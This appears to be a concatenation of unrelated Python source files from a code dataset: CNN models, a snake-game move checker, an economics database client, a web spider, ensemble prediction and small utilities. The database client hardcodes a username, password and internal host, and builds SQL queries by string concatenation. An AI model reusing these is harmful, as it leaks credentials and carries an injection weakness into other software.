1*7 and 7*1(same)\n branch7x7dbl = self.branch7x7dbl_1(x)\n branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)\n branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)\n branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)\n branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)\n\n #x-> avgpool (same)\n branchpool = F.avg_pool2d(x,kernel_size=3,stride=1,padding=1)\n branchpool = self.branch_pool(branchpool)\n\n outputs = [branch1x1, branch7x7, branch7x7dbl, branchpool]\n\n return torch.cat(outputs, 1)\n\n\nclass InceptionD(nn.Module):\n\n def __init__(self, input_channels):\n super().__init__()\n\n self.branch3x3_1 = BasicConv2d(input_channels, 192, kernel_size=1)\n self.branch3x3_2 = BasicConv2d(192, 320, kernel_size=3, stride=2)\n\n self.branch7x7_1 = BasicConv2d(input_channels, 192, kernel_size=1)\n self.branch7x7_2 = BasicConv2d(192, 192, kernel_size=(1, 7), padding=(0, 3))\n self.branch7x7_3 = BasicConv2d(192, 192, kernel_size=(7, 1), padding=(3, 0))\n self.branch7x7_4 = BasicConv2d(192, 192, kernel_size=3, stride=2)\n\n def forward(self, x):\n\n #x -> 1x1 -> 3x3(downsample)\n branch3x3 = self.branch3x3_1(x)\n branch3x3 = 
self.branch3x3_2(branch3x3)\n\n #x -> 1x1 -> 1x7 -> 7x1 -> 3x3 (downsample)\n branch7x7 = self.branch7x7_1(x)\n branch7x7 = self.branch7x7_2(branch7x7)\n branch7x7 = self.branch7x7_3(branch7x7)\n branch7x7 = self.branch7x7_4(branch7x7)\n\n #x -> avgpool (downsample)\n branchpool = F.max_pool2d(x,kernel_size=3,stride=2)\n\n outputs = [branch3x3, branch7x7, branchpool]\n\n return torch.cat(outputs, 1)\n\n\nclass InceptionE(nn.Module):\n def __init__(self, input_channels):\n super().__init__()\n self.branch1x1 = BasicConv2d(input_channels, 320, kernel_size=1)\n\n self.branch3x3_1 = BasicConv2d(input_channels, 384, kernel_size=1)\n self.branch3x3_2a = BasicConv2d(384, 384, kernel_size=(1, 3), padding=(0, 1))\n self.branch3x3_2b = BasicConv2d(384, 384, kernel_size=(3, 1), padding=(1, 0))\n\n self.branch3x3stack_1 = BasicConv2d(input_channels, 448, kernel_size=1)\n self.branch3x3stack_2 = BasicConv2d(448, 384, kernel_size=3, padding=1)\n self.branch3x3stack_3a = BasicConv2d(384, 384, kernel_size=(1, 3), padding=(0, 1))\n self.branch3x3stack_3b = BasicConv2d(384, 384, kernel_size=(3, 1), padding=(1, 0))\n\n self.branch_pool = BasicConv2d(input_channels, 192, kernel_size=1)\n\n def forward(self, x):\n\n #x -> 1x1 (same)\n branch1x1 = self.branch1x1(x)\n\n # x -> 1x1 -> 3x1\n # x -> 1x1 -> 1x3\n # concatenate(3x1, 1x3)\n #\"\"\"7. Inception modules with expanded the filter bank outputs.\n #This architecture is used on the coarsest (8 × 8) grids to promote\n #high dimensional representations, as suggested by principle\n #2 of Section 2.\"\"\"\n branch3x3 = self.branch3x3_1(x)\n branch3x3 = [\n self.branch3x3_2a(branch3x3),\n self.branch3x3_2b(branch3x3)\n ]\n branch3x3 = torch.cat(branch3x3, 1)\n\n # x -> 1x1 -> 3x3 -> 1x3\n # x -> 1x1 -> 3x3 -> 3x1\n #concatenate(1x3, 3x1)\n branch3x3stack = self.branch3x3stack_1(x)\n branch3x3stack = self.branch3x3stack_2(branch3x3stack)\n branch3x3stack = [\n self.branch3x3stack_3a(branch3x3stack),\n self.branch3x3stack_3b(branch3x3stack)\n ]\n branch3x3stack = torch.cat(branch3x3stack, 1)\n\n branchpool = F.avg_pool2d(x,kernel_size=3,stride=1,padding=1)\n branchpool = self.branch_pool(branchpool)\n\n outputs = [branch1x1, branch3x3, branch3x3stack, branchpool]\n\n return torch.cat(outputs, 1)\n\nclass InceptionAux(nn.Module):\n def __init__(self,in_channels,num_classes):\n super(InceptionAux,self).__init__()\n self.conv0 = BasicConv2d(in_channels,128,kernel_size=1)\n self.conv1 = BasicConv2d(128,768,kernel_size=5)\n self.conv1.stddev = 0.01\n self.fc = nn.Linear(768,num_classes)\n self.fc.stddev = 0.001\n\n def forward(self,x):\n #17x17x768\n x = F.avg_pool2d(x,kernel_size=5,stride=3)\n #5x5x768\n x = self.conv0(x)\n #5x5x128\n x = self.conv1(x)\n #1x1x768\n x = x.view(x.size(0),-1)\n #768\n x = self.fc(x)\n return x\n\nclass BasicConv2d(nn.Module):\n def __init__(self,in_channels,out_channels,**kwargs):\n super(BasicConv2d,self).__init__()\n self.conv = nn.Conv2d(in_channels,out_channels,bias=False,**kwargs)\n self.bn = nn.BatchNorm2d(out_channels,eps=0.001)\n\n def forward(self,x):\n x = self.conv(x)\n x = self.bn(x)\n return F.relu(x,inplace=True)\n","sub_path":"assess_boneage/models/InceptionV3_PAM_CAM.py","file_name":"InceptionV3_PAM_CAM.py","file_ext":"py","file_size_in_byte":15328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"258723333","text":"from data.virtualsnake import VirtualSnake\nfrom utils.priorityqueue import PriorityQueue\nfrom collections import deque\n\nclass LongevityChecker:\n 
\"\"\"Checks whether a snake has plenty of moves left or is actually doomed.\"\"\"\n\n MAX_SNAKES = 50\n MAX_STEPS = 30 # Warning: this may be changed at runtime if the game nears the end.\n # (Not yet implemented though.)\n\n @staticmethod\n def freedom_degree(snake, other_snake=None):\n \"\"\"Returns she maximum amount of moves shat can be made, or MAX_STEPS, along\n with the length of the longest snake that can be made at specific time steps.\"\"\"\n\n snakes = [snake.clone_virtual()]\n movements = 0\n max_length = 0\n max_length_arr = [snake.length]\n\n # This function shall keep making virtual snakes in all directions the old\n # snakes could move. If too many snakes are born, prefer the longer ones.\n\n for i in range(LongevityChecker.MAX_STEPS):\n new_snakes = deque()\n for j in range(LongevityChecker.MAX_SNAKES):\n if not snakes: # Snakes is empty\n break\n snake = snakes.pop()\n available_directions = snake.get_available_directions(other_snake=other_snake)\n for i in range(len(available_directions)):\n # We want to put a clone of this snake in the new collection.\n # However, if this is the last direction for this snake, we\n # may as well use the snake himself, since he won't be needed\n # later. This significantly improves performance by not\n # copying things.\n # Compare it to the C++ move operator.\n if i == len(available_directions) - 1:\n new_snake = snake\n else:\n new_snake = snake.clone_virtual()\n \n new_snake.move(available_directions[i])\n new_snakes.append(new_snake)\n\n if max_length < new_snake.length:\n max_length = new_snake.length\n if not new_snakes:\n break\n else:\n max_length_arr.append(max_length)\n movements += 1\n snakes = sorted(new_snakes, key=lambda snake: snake.length)\n \n return (movements, max_length_arr)\n","sub_path":"control/modules/longevitychecker.py","file_name":"longevitychecker.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"34621022","text":"\n\nfrom xai.brain.wordbase.nouns._crackle import _CRACKLE\n\n#calss header\nclass _CRACKLED(_CRACKLE, ):\n\tdef __init__(self,): \n\t\t_CRACKLE.__init__(self)\n\t\tself.name = \"CRACKLED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"crackle\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_crackled.py","file_name":"_crackled.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"72075896","text":"'''\nCreated on 2019年3月23日\n\n@author: user\n'''\nimport datetime as dt\n\nfrom pandas import DataFrame\n\nfrom panormus.data.bo.db_engine import (MySqlEngine)\n\n\ndef get_instance_using_credentials():\n \"\"\"\n :description: creates an connector public read-only credentials\n :return: client instance\n \"\"\"\n\n return EconDb(user='ECON_RO', password='RpZi7Mie5oRSEjyp')\n\n\nclass EconDb(MySqlEngine):\n \"\"\"\n Create a connector to economics database\n\n \"\"\"\n\n def __init__(\n self, user, password,\n db_name='ECON',\n host='econ-ro.mysql.pm.a.dev.use1.aws.caxton.com',\n port=3306,\n connector='mysql+pymysql',\n pool_recycle=1800,\n verifyServerCertificate=False,\n ):\n \"\"\"\n :param str user: database user\n :param str password: password\n :param str db_name: database name within host\n :param str host: host address\n :param int port: port number\n :param str connector: connection driver for sql alchemy\n :param int pool_recycle: connection pool recycle period\n \"\"\"\n 
super().__init__(\n user=user, password=password,\n db_name=db_name, host=host, port=port,\n connector=connector, pool_recycle=pool_recycle,\n connect_args={'ssl': {'check_hostname': verifyServerCertificate}}\n )\n\n def get(self,\n tickers,\n start_date=dt.datetime(1500, 1, 1), end_date=dt.datetime(2099, 12, 31),\n vintage='last', output='data', query_raw_db=False\n ):\n \"\"\"\n Get time series for tickers in the Economic Database\n\n :param str|list[str] tickers: EDB tags \\\n (see: https://tableau.a.dev.use1.aws.caxton.com/#/views/Haver_Extract/Haver?:iid=1)\n :param dt.datetime|None start_date: Optional start date\n :param dt.datetime|None end_date: Optional end date\n :param str vintage: 'last' for the last revision and 'first' for the first known unrevised value\n :param str output: 'data' for the data or 'timestamp' for the timestamps of the data\n :param bool query_raw_db: False to query helper tables, True to query the raw DB directly\n :rtype: DataFrame\n \"\"\"\n # parse data\n if start_date is None:\n start_date = dt.datetime(1500, 1, 1)\n if end_date is None:\n end_date = dt.datetime(2099, 12, 31)\n\n if isinstance(tickers, str):\n tickers = [tickers]\n\n if vintage.lower() in ('last', 'revised'):\n if query_raw_db:\n select = \"Attribute, TimeStamp, Value, MAX(KnownAsOf)\"\n db = \"EDB\"\n groupby = \" GROUP BY Attribute, TimeStamp\"\n else:\n select = \"*\"\n db = \"LastEDB\"\n groupby = \"\"\n elif vintage.lower() in ('first', 'unrevised'):\n if query_raw_db:\n select = \"Attribute, TimeStamp, Value, MIN(KnownAsOf)\"\n db = \"EDB\"\n groupby = \" GROUP BY Attribute, TimeStamp\"\n else:\n select = \"*\"\n db = \"FirstEDB\"\n groupby = \"\"\n else:\n raise ValueError(f\"Vintage option '{vintage}' not valid\")\n\n if output.lower() == 'data':\n col = 'Value'\n elif output.lower() == 'timestamp':\n col = 'KnownAsOf'\n\n sd_str = \"\\'\" + start_date.strftime(\"%Y-%m-%d\") + \"\\'\"\n ed_str = \"\\'\" + end_date.strftime(\"%Y-%m-%d\") + \"\\'\"\n tags_str = \",\".join([\"\\'\" + tag + \"\\'\" for tag in tickers])\n # tags_str = 'USA_PMI_SERVICES_SA'\n sql_string = (\n f\"SELECT {select} FROM ECON.{db} WHERE Attribute IN ({tags_str}) \"\n f\"AND TimeStamp >= {sd_str} AND TimeStamp <= {ed_str}{groupby}\"\n )\n # 'USA_SBO_NFIB_INDEX_SA' in df_raw['Attribute']\n # run sql query\n df_raw = self.run_query(sql_string)\n df_out = df_raw.pivot(index='TimeStamp', columns='Attribute', values=col)\n # df_out.plot()\n return df_out\n ","sub_path":"Caxton/panormus_OLD/data/bo/econ.py","file_name":"econ.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"73175622","text":"# coding=utf-8\r\nfrom scrapy.spider import BaseSpider\r\nfrom weisou.items import WeisouItem\r\nfrom scrapy.selector import HtmlXPathSelector\r\nfrom grab.models import Weixingongzhong\r\n\r\nclass GongZhongHaoSpider(BaseSpider):\r\n\t'''\r\n\tscrapy crawl gongzhognhao\r\n\t抓取选定的微信公众号内容\r\n\t微信搜索已经启用反爬虫程序,目前爬不了内容\r\n\t'''\r\n\tname = \"gongzhonghao\"\r\n\tallowed_domains = [\"http://weixin.sogou.com/\"]\r\n\tstart_urls = []\r\n\r\n\tweixinlist = Weixingongzhong.objects.filter(state='1')\r\n\tfor weixin in weixinlist:\r\n\t\tstart_urls.append(weixin.weixinurl)\r\n\r\n\tdef parse(self, response):\r\n\t\thxs = HtmlXPathSelector(response)\r\n\t\tsites = hxs.select('//div[@class=\"wx-rb wx-rb3\"]')\r\n\t\tfor site in sites:\r\n\t\t\titem = WeisouItem()\r\n\t\t\titem['title'] = 
site.select('div[@class=\"txt-box\"]/h4/a/text()').extract()[0]\r\n\t\t\titem['desc'] = site.select('div[@class=\"txt-box\"]/p/text()').extract()[0]\r\n\t\t\titem['pic'] = site.select('div[@class=\"img_box2\"]/a/img/@src').extract()[0]\r\n\t\t\titem['url'] = site.select('div[@class=\"img_box2\"]/a/@href').extract()[0]\r\n\t\t\t#print item['title'] + '\\n' + item['desc'] + '\\n' + item['pic'] + '\\n' + item['url']\r\n\t\t\tyield item","sub_path":"weisou/weisou/spiders/GongZhongHaoSpider.py","file_name":"GongZhongHaoSpider.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"247907247","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPackage for the major class of making ensemble predictions using multiple trained models\n\nAuthor: Lianfa Li\nDate: 2019-08-01\n\n\"\"\"\n\n\nimport os\nimport multiprocessing\nfrom multiprocessing import Process, Manager\nimport pickle\nimport math\n\nimport pandas as pd\nimport numpy as np\nfrom keras.models import model_from_json\nfrom baggingrnet.util.pmetrics import r2K,r2KAuto,r2np,rmse2np\n\nclass ensPrediction:\n \"\"\"\n Major class of making ensebmle predictions using trained bagging models\n\n # Examples\n\n ```python\n # import the major prediction class\n from baggingrnet.model.baggingpre import ensPrediction\n inPath='covs_test.csv' # The path to the test CSV dataset ;\n gindex='gindex' # Unique identifier to merging the predictions from multiple models;\n feasList = ['lat', 'lon', 'ele', 'prs'] # List of the name of the predictors to be used in the models;\n target='pm25_avg_log' # Name of the target variable (dependent test)\n bagpath='/testpath/baggingrnet' # The bagging path used to store training results in bagging;\n prepath=\"/testpath/bagprediction1\" # The path to save the results of prediction ;\n mbagpre=ensPrediction(bagpath,prepath) # The instance of the class ensPrediction with the arguments, bagpath,prepath;\n mbagpre.getInputSample(inPath, feasList,gindex) # Load the test datatset\n mbagpre.startMProcess(10) # Start the prediction process using 10 core for parallel predicting;\n mbagpre.aggPredict(isval=True,tfld='pm25_davg') # Get the ensemble predictions from the predictions of multiple models.\n ```\n # Arguments\n :param baggingpath: the root path for multple models,,same as in the bagging class;\n :param targetpath: the target path to save the predictions of multiple models and the ensembled predictions;\n :param maxlimit: Threshold for the extreme values of the predictions, default: 750.\n \"\"\"\n def __init__(self,baggingpath,targetpath,maxlimit=750):\n tfl = baggingpath + \"/tasks.pkl\"\n with open(tfl, 'rb') as handle:\n self.tasks = pickle.load(handle)\n self.maxlimit=maxlimit\n self.targetpath=targetpath\n normPath = baggingpath + \"/wholesc.pkl\"\n with open(normPath, 'rb') as handle:\n self.scX = pickle.load(handle)\n self.scy = pickle.load(handle)\n\n def getInputSample(self,input, feasList,gindex):\n \"\"\"\n Function to read the test CSV file\n :param input: Path of the CSV data file (with header available) or the dataframe object;\n :param feasList: List of the names of predictors to be used in the models ;\n :param gindex: Name of unique identifier for each record (item), used later for aggregating;\n \"\"\"\n if type(input)==str and input!='':\n sampledt = pd.read_csv(input)\n elif type(input)==pd.DataFrame:\n sampledt=input\n else:\n print(\"Please enter the data file path or original Data Frame of the input! 
\")\n return\n self.gindexFld=gindex\n self.tcols =feasList\n self.sampledt=sampledt\n X = sampledt[self.tcols]\n self.Xn = self.scX.transform(X)\n\n def DModelPredict(self,imodel,modelpath,feaIndex,islog=True):\n \"\"\"\n Function to making the predictions for a model.\n :param imodel: Model unique identifier ;\n :param modelpath: The path of the trained model ;\n :param feaIndex: Index of the predictors (features) used in the models;\n :return: the output layer saved in the corresponding path.\n \"\"\"\n structureFl = modelpath +'/mframe.json'\n json_file = open(structureFl, 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n loaded_model = model_from_json(loaded_model_json)\n # load weights into new model\n weiFl = modelpath +'/weights.hd5'\n loaded_model.load_weights(weiFl)\n loaded_model.compile(optimizer=\"adam\", loss='mean_squared_error',\n metrics=['mean_squared_error', r2K, r2KAuto])\n Xns=self.Xn[:,feaIndex]\n pre0 = loaded_model.predict(Xns)\n pre = self.scy.inverse_transform(pre0)\n if islog:\n pre = np.exp(pre)\n pre=pre.reshape((pre.shape[0],))\n pre[pre > self.maxlimit] = self.maxlimit\n self.sampledt['pre'] = pre\n tfl = self.targetpath + '/m' + str(imodel) + '_tpre.csv'\n self.sampledt[[self.gindexFld,'pre']].to_csv(tfl, index=False)\n\n def subPredict(self, istart, iend):\n \"\"\"\n Function to initiate a process to make predictions for one or multiple trained models.\n :param istart: Staring model identifier;\n :param iend: Ending model identifier;\n \"\"\"\n p = multiprocessing.current_process()\n print(\"Starting process \" + p.name + \", pid=\" + str(p.pid) + \" ... ...\")\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = ''\n klist = list(self.tasks.keys())\n klist.sort()\n for i in range(istart, iend):\n mkey=klist[i]\n aTask = self.tasks[mkey]\n imodel = aTask['name']\n feaIndex = aTask['feaIndex']\n modelpath = aTask['taskPath']\n islog = aTask['islog']\n self.DModelPredict(imodel,modelpath,feaIndex,islog)\n print(\"Done with \" + p.name + \", pid=\" + str(p.pid) + \"!\")\n\n def startMProcess(self, ncore):\n \"\"\"\n Function to initiate multiple process to make the predictions for multiple models.\n :param ncore: Number of cores to be used in parallel predictions;\n \"\"\"\n n = len(self.tasks)\n nTime = int(math.ceil(n / ncore))\n print(str(ncore) + \" cores for \" + str(n) + \" duties; each core has about \" + str(nTime) + \" duties\")\n for t in range(0, nTime):\n istart = t * ncore\n iend = (t + 1) * ncore\n if t == (nTime - 1):\n iend = n\n processes = []\n for k in range(istart, iend):\n p = Process(name=str(t), target=self.subPredict, args=(k, k + 1,))\n p.daemon = True\n p.start()\n processes.append(p)\n for p in processes:\n p.join()\n\n def aggPredict(self,isval=False,tfld=None):\n \"\"\"\n Function to obtain the ensemble predicitons from the outputs of multiple models and evaluation (optional).\n :param isval: False, no evaluation for the ensemble predictions; True, evaluation for the ensemble predictions. 
Default: False;\n :param tfld: Name of the target variable of ground truth onlu work when isval is True.\n :return:The ensemble predictions to be saved on the aggpreds_eval.csv file of the prediction path;\n print the evaluation's results if isval is True.\n \"\"\"\n klist = list(self.tasks.keys())\n klist.sort()\n allpreds=[]\n for i in range(len(klist)):\n mkey = klist[i]\n aTask = self.tasks[mkey]\n imodel = aTask['name']\n tfl = self.targetpath + '/m' + str(imodel) + '_tpre.csv'\n apredictions= pd.read_csv(tfl)\n allpreds.append(apredictions)\n allpreds=pd.concat(allpreds)\n grouped = allpreds['pre'].groupby(allpreds['gindex'])\n gmeann=grouped.mean().to_frame('mean')\n gstd=grouped.std().to_frame('std')\n mergedPre=pd.merge(gmeann, gstd, left_index=True, right_index=True)\n mergedPre.to_csv(self.targetpath+'/aggpreds.csv')\n if not isval:\n return\n evalPre = pd.merge(mergedPre, self.sampledt[['gindex',tfld]],\n left_index=True, right_on='gindex')\n r2 = r2np(evalPre['mean'], evalPre[tfld])\n rmse = rmse2np(evalPre['mean'], evalPre[tfld])\n evalPre.to_csv(self.targetpath + '/aggpreds_eval.csv')\n print(\"Independent test r2=\",r2,\"; rmse=\",rmse)","sub_path":"build/lib.linux-x86_64-3.4/baggingrnet/model/baggingpre.py","file_name":"baggingpre.py","file_ext":"py","file_size_in_byte":8179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"80569121","text":"# O(N) time complexity, O(N) space complexity\nclass Solution:\n def isReflected(self, points):\n \"\"\"\n :type points: List[List[int]]\n :rtype: bool\n \"\"\"\n if points == None or len(points) < 2: return True \n min_x = float('inf')\n max_x = -float('inf')\n s = set()\n for x, y in points:\n min_x = min(min_x, x)\n max_x = max(max_x, x)\n s.add(str(x) + ' ' + str(y)) \n sum_ = max_x + min_x\n for point in s:\n x, y = point.split(\" \")\n new_x = sum_ - int(x)\n if str(new_x)+\" \"+str(y) not in s: return False\n return True\n","sub_path":"Math/LineReflection_356.py","file_name":"LineReflection_356.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"276835938","text":"import numpy as np\nimport cv2\n\ndef validate_array_input(noisy_images: np.ndarray):\n assert type(noisy_images) == np.ndarray, \\\n 'noisy_images should be a numpy array.'\n \n assert len(noisy_images.shape) == 4, \\\n 'noisy_images should have 4 dimensions. 
\\\n Read the function documentation for more details.'\n\n assert noisy_images.shape[3] == 1 or noisy_images.shape[3] == 3, \\\n 'The color dimensions should be 1 for grayscale \\\n or 3 for RGB colored images.'\n\ndef validate_if_noise_std_dev_is_a_float(noise_std_dev: float):\n assert type(noise_std_dev) == float, 'noise_std_dev should be float.'\n\ndef normalize(numpy_array: np.ndarray, interval=(0, 255), data_type: str = 'float') -> np.ndarray:\n assert data_type in ('float', 'int'), 'data_type should be \"float\" or \"int\".'\n \n out = cv2.normalize(numpy_array, None, alpha = interval[0], beta = interval[1], norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n\n if data_type == 'float':\n return out\n else:\n return out.astype('uint16')\n","sub_path":"denoising/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"71361028","text":"import os\nimport time\nimport tensorflow as tf\nimport numpy as np\nimport uabCrossValMaker\nimport uab_collectionFunctions\nimport sis_utils\nfrom bohaoCustom import uabMakeNetwork_UNet\n\n# settings\ngpu = 1\nbatch_size = 1\n#input_sizes = [828, 1084, 1340, 1596, 572, 1852, 2108, 2364, 2620]\n#input_sizes = [540, 572, 620, 684, 796]\n#batch_sizes = [6, 5, 4, 3, 2]\ninput_sizes = [412, 460, 476, 492, 508]\nbatch_sizes = [15, 10, 9, 8, 7]\ntile_size = [5000, 5000]\nimg_dir, task_dir = sis_utils.get_task_img_folder()\n\nfor cnt, size in enumerate(input_sizes):\n start_time = time.time()\n\n tf.reset_default_graph()\n input_size = [size, size]\n\n model_dir = r'/hdd/Models/exp2/UnetCrop_inria_aug_grid_1_PS({}, {})_BS{}_EP100_LR0.0001_DS60_DR0.1_SFN32'.\\\n format(size, size, batch_sizes[cnt])\n blCol = uab_collectionFunctions.uabCollection('inria')\n blCol.readMetadata()\n file_list, parent_dir = blCol.getAllTileByDirAndExt([0, 1, 2])\n file_list_truth, parent_dir_truth = blCol.getAllTileByDirAndExt(4)\n idx, file_list = uabCrossValMaker.uabUtilGetFolds(None, file_list, 'force_tile')\n idx_truth, file_list_truth = uabCrossValMaker.uabUtilGetFolds(None, file_list_truth, 'force_tile')\n # use first 5 tiles for validation\n file_list_valid = uabCrossValMaker.make_file_list_by_key(\n idx, file_list, [i for i in range(0, 6)],\n filter_list=['bellingham', 'bloomington', 'sfo', 'tyrol-e', 'innsbruck'])\n file_list_valid_truth = uabCrossValMaker.make_file_list_by_key(\n idx_truth, file_list_truth, [i for i in range(0, 6)],\n filter_list=['bellingham', 'bloomington', 'sfo', 'tyrol-e', 'innsbruck'])\n img_mean = blCol.getChannelMeans([0, 1, 2])\n\n # make the model\n # define place holder\n X = tf.placeholder(tf.float32, shape=[None, 1052, 1052, 3], name='X')\n y = tf.placeholder(tf.int32, shape=[None, 1052, 1052, 1], name='y')\n mode = tf.placeholder(tf.bool, name='mode')\n model = uabMakeNetwork_UNet.UnetModelCrop({'X':X, 'Y':y},\n trainable=mode,\n input_size=[1052, 1052],\n batch_size=1)\n # create graph\n model.create_graph('X', class_num=2)\n\n # evaluate on tiles\n iou_return = model.evaluate(file_list_valid, file_list_valid_truth, parent_dir, parent_dir_truth,\n [1052, 1052], tile_size, batch_size, img_mean, model_dir, gpu, save_result=False)\n duration = time.time() - start_time\n\n iou_return['time'] = duration\n np.save(os.path.join(task_dir, '{}_samesize.npy'.format(size)), 
iou_return)\n","sub_path":"]tasks/2017.12.16.framework_train_cnn/test_inria_different_scale.py","file_name":"test_inria_different_scale.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"276945487","text":"import wx\nimport wx.aui\nfrom . import corbomiteGuiWidgetFactory\nimport wx.lib.newevent\n\n\nclass DevicePanel(wx.Panel):\n def __init__(self, parent):\n print(\"Device panel constructor start\")\n wx.Panel.__init__(self, parent=parent, id=wx.ID_ANY)\n self.sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(self.sizer)\n self.widgets = {}\n self.parent = parent\n self.myInitEvent, self.EVT_MY_INIT_EVENT = wx.lib.newevent.NewEvent()\n self.Bind(self.EVT_MY_INIT_EVENT, self.receiveInitEvent)\n self.parent.Layout()\n print(\"Device panel constructor finished\")\n\n def receiveInitEvent(self, widget):\n new = corbomiteGuiWidgetFactory.createWidget(self, widget)\n if new is not None:\n self.sizer.Add(new, new.yWeight, wx.EXPAND)\n self.sizer.Layout()\n\n def initCallback(self, widget):\n wx.CallAfter(self.receiveInitEvent, widget)\n\n def receiveCallback(self, data):\n # if data == \"idle\":\n # print \"Idle\"\n # if data == \"busy\":\n # print \"Busy\"\n pass\n","sub_path":"trunk/src/py_to_3/hmi/devicePanel.py","file_name":"devicePanel.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"87653595","text":"import socket\r\n\r\n\r\nhost = \"localhost\"\r\nport = 2406\r\n\r\ntcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\ndestino = (host,port)\r\n\r\ntcp.connect(destino)\r\n\r\nwhile(True):\r\n\tmsg = input(\"Digite a mensagem: \")\r\n\ttcp.send(msg.encode(\"utf-8\"))\r\n\tif(msg == \"sair\"):break\r\n\t\r\ntcp.close() \r\n","sub_path":"aula Pratica/exercicio3/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"237260123","text":"import sys\nimport numpy as np\nimport pandas as pd\nimport xgboost as xgb\nimport time\nimport itertools\nimport pickle\nimport copy\nfrom sklearn import neighbors as knn\nfrom sklearn import linear_model as lm\nfrom sklearn import feature_selection as fs\nfrom sklearn import model_selection as ms\nfrom sklearn.decomposition import nmf\nfrom sklearn import svm\nfrom sklearn import ensemble\nfrom sklearn import tree\nfrom sklearn import pipeline\nfrom sklearn import preprocessing\nfrom sklearn import metrics\nimport alm_data\nimport alm_ml\nimport alm_es\nimport alm_fun\nfrom datetime import datetime\nfrom numpy import gradient\n\n\nclass alm_project:\n\n def __init__(self, project_init_params, data_init_params,ml_init_params,es_init_params): \n ####*************************************************************************************************************************************************************\n # Define Project specific parameters and initialize the project \n ####*************************************************************************************************************************************************************\n # *project_name: project name\n # *project_path: project root path\n # *ml_type: classification or regression\n # *cv_split_method: [0] k_folds [1]Stratified k_folds\n # *cv_split_folds: n folds cross-validataion\n # *data_name: name of the datasets\n # *test_file: the file path for the test dataset\n # 
*train_file: the file path for the training dataset\n # *extra_train_file: the file path for the extra training dataset\n # *use_extra_train_data: whether you are going to use the extra training dataset \n # *dependent_variable: the column name for the dependent variable\n # *onehot_features: features are categorical (may be can be detected automatically later)\n # *initial_features: features used in the analysis\n # *train_features: features used for training\n # *compare_features: features used to compare performance individually\n # *interaction_features: features used to study feature interaction\n # *interaction_features_name: name of the features or feature groups used to study feature interaction\n # *percent_min_feature: remove the feature if the missing data of this feature is lower than percent_min_feature% \n ####*************************************************************************************************************************************************************\n for key in project_init_params:\n setattr(self, key, project_init_params[key])\n \n #***************************************************************************************************************************************************************\n # initialize alphame ml object\n #***************************************************************************************************************************************************************\n self.ml = alm_ml.alm_ml(ml_init_params)\n \n #***************************************************************************************************************************************************************\n # initialize alphame estimators\n #***************************************************************************************************************************************************************\n self.estimators = self.construct_estimators(es_init_params)\n \n #***************************************************************************************************************************************************************\n # initialize alphame dataset parameters (share with different datasets)\n #***************************************************************************************************************************************************************\n self.data = {}\n for i in range(len(self.data_names)): \n data_init_params['name'] = self.data_names[i] \n if self.input_data_type[i] == 'file':\n if self.target_data[i] is None:\n data_init_params['target_data_original_df'] = pd.DataFrame()\n else: \n data_init_params['target_data_original_df'] = pd.read_csv(self.target_data[i])\n \n if self.train_data[i] is None: \n data_init_params['train_data_original_df'] = pd.DataFrame()\n else:\n data_init_params['train_data_original_df'] = pd.read_csv(self.train_data[i])\n \n if self.test_data[i] is None: \n data_init_params['test_data_original_df'] = pd.DataFrame()\n else:\n data_init_params['test_data_original_df'] = pd.read_csv(self.test_data[i])\n \n if self.extra_train_data[i] is None:\n data_init_params['extra_train_data_original_df'] = pd.DataFrame()\n else: \n data_init_params['extra_train_data_original_df'] = pd.read_csv(self.extra_train_data[i])\n \n data_init_params['use_extra_train_data'] = self.use_extra_train_data[i] \n \n if self.input_data_type[i] == 'dataframe':\n data_init_params['target_data_original_df'] = self.target_data[i]\n data_init_params['train_data_original_df'] = self.train_data[i]\n data_init_params['test_data_original_df'] = self.test_data[i]\n 
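# inputs supplied as DataFrames are wired in directly, skipping the CSV reads above\n                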
